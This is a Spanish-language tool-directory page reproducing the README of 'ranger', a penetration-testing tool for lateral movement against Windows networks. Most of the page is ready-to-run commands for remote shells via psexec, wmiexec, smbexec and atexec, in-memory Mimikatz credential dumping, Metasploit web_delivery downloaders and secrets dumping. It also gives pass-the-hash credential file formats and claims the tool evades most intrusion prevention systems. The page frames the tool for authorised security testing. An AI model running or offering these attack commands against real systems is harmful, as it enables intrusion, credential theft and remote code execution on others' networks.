Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ranger — Una herramienta para profesionales de seguridad para acceder e interactuar con sistemas remotos basados en Microsoft Windows. | Kitploit
Herramientas/GitHubGitHub/funkandwagnalls/ranger
Generación de PayloadsExplotaciónMovimiento LateralPost-ExplotaciónPruebas de PenetraciónComando y Control
GitHubfunkandwagnalls/ranger

ranger

Una herramienta para profesionales de seguridad para acceder e interactuar con sistemas remotos basados en Microsoft Windows.

Ver Repositorio
4318216hace 10 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ranger

Una herramienta para ayudar a los profesionales de seguridad a acceder e interactuar con sistemas remotos basados en Microsoft Windows.

Este proyecto fue conceptualizado con el pensamiento de que no inventamos el arco ni la flecha, solo una forma más eficiente de usarlos.

Ranger es una herramienta de ataque y pruebas de penetración basada en línea de comandos, que tiene la capacidad de utilizar un servidor catapulta instanciado para entregar capacidades contra sistemas Windows. Mientras un usuario disponga de un conjunto de credenciales o un conjunto de hashes (NTLM, LM, LM:NTLM), puede obtener acceso a sistemas que forman parte de la confianza.

Usando esta capacidad, un profesional de seguridad puede extraer credenciales de la memoria en texto claro, acceder a tablas SAM, ejecutar comandos, scripts de PowerShell, binarios de Windows y otras herramientas. Actualmente, la herramienta evita la mayoría de las soluciones de proveedores de IPS a menos que hayan sido ajustadas específicamente para detectarla. La herramienta fue desarrollada utilizando nuestros laboratorios domésticos con el objetivo de apoyar a los profesionales de seguridad en actividades legalmente y/o contractualmente respaldadas.

Se está agregando más funcionalidad, pero por ahora la herramienta utiliza las contribuciones de la comunidad de repositorios relacionados con los equipos de PowerShell PowerView, PowerShell Mimikatz e Impacket.

Gestionando Ranger:

Instalación:

wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh

Actualización:

ranger --update

Uso:

  • Ranger utiliza una combinación de métodos y ataques, un método se usa para entregar un ataque/comando
  • Un ataque es lo que intentas lograr
  • Algunos elementos son tanto método como ataque combinados en uno, y algunos métodos no pueden usar algunos de los ataques debido a limitaciones actuales en las bibliotecas o protocolos

Métodos y Ataques:

--scout
--secrets-dump

Método:

--wmiexec
--psexec
--smbexec
--atexec

Ataque:

--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access

Ejecución de Comandos:

Encontrar Usuarios Conectados:

ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout

Shell de Comandos SMBEXEC:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv

Shell de Comandos PSEXEC:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv

Ejecución de Comandos PSEXEC:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv

Ejecución de Comandos WMIEXEC:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"

Inyector de Memoria PowerShell Mimikatz WMIEXEC:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker

Inyector de Memoria web_delivery Metasploit WMIEXEC (requiere configuración de Metasploit, ver más abajo):

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader

Inyector de Memoria de Código Personalizado WMIEXEC:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"

Ejecución de Comandos ATEXEC:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder

Inyector de Memoria PowerShell Mimikatz ATEXEC:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder

Inyector de Memoria web_delivery Metasploit ATEXEC (requiere configuración de Metasploit, ver más abajo):

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder

Inyector de Memoria de Código Personalizado ATEXEC:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder

Inyector de Memoria de Código Personalizado SECRETSDUMP:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump

Crear Ataque Mimikatz Pegable:

ranger.py --invoker -q -v -vv -vvv

Crear Ataque web_delivery Pegable (requiere configuración de Metasploit, ver más abajo):

ranger.py --downloader -q -v -vv -vvv

Crear Ataque Ejecutor Pegable:

ranger.py --executor -q -v -vv -vvv

Identificación de Miembros de Grupos y Dominios

  • Al identificar grupos, asegúrate de determinar cuál es el dominio de consulta real con --get-domain-membership
  • Luego, al consultar un grupo, usa el --domain opcional, que te permite apuntar a un dominio diferente al que iniciaste sesión
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"

Notas sobre el Uso:

Formato del Archivo de Credenciales:

  • Puedes pasar una lista de nombres de usuario y contraseñas o hashes en el siguiente formato en el mismo archivo:
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM  domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain

Advertencias del Archivo de Credenciales:

  • Si proporcionas nombres de dominio en el archivo, se usarán en lugar del WORKGROUP predeterminado.
  • Si proporcionas el nombre de dominio por línea de comandos -d, se interpretará que deseas ignorar todos los nombres de dominio del archivo.

Ejecución por Línea de Comandos:

  • Si no deseas usar el archivo, puedes pasar los detalles directamente por línea de comandos.
  • Si deseas proporcionar hashes en lugar de contraseñas, simplemente pásalos a través del argumento de contraseña.
  • Si están en formato PWDUMP y no proporcionas un nombre de usuario, extraerá el nombre de usuario del hash.
  • Si proporcionas un nombre de usuario, considerará que el mismo hash se aplica a un usuario diferente.
  • Usa los siguientes formatos para la contraseña:
password
LM:NTLM
:NTLM
PWDUMP

Objetivos y Exclusiones:

  • Los objetivos y las exclusiones se pueden usar al mismo tiempo

Objetivos, Rangos de Objetivos, CIDR de Objetivos, Listas de Objetivos, Objetivos XML de NMAP:

  • Puedes proporcionar una lista de objetivos ya sea usando una lista de objetivos o a través de la opción de objetivo.
  • Puedes proporcionar múltiples archivos de lista de objetivos separándolos por comas, y agregará los datos y eliminará duplicados, y luego excluirá tu dirección IP de la interfaz predeterminada o de la interfaz que proporciones.
  • La herramienta acepta notaciones CIDR, rangos pequeños (192.168.195.1-100) o rangos grandes (192.168.194.1-192.163.1.1) o direcciones IP individuales.
  • Nuevamente, solo sepáralos por comas en la línea de comandos o colócalos en un archivo delimitado por nuevas líneas.
  • Los XML de Nmap también se pueden usar para apuntar a sistemas; también pueden estar separados por comas.
  • La herramienta normalizará y eliminará duplicados antes de apuntar a las máquinas.
  • EJEMPLO: -t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xml
Descargar herramienta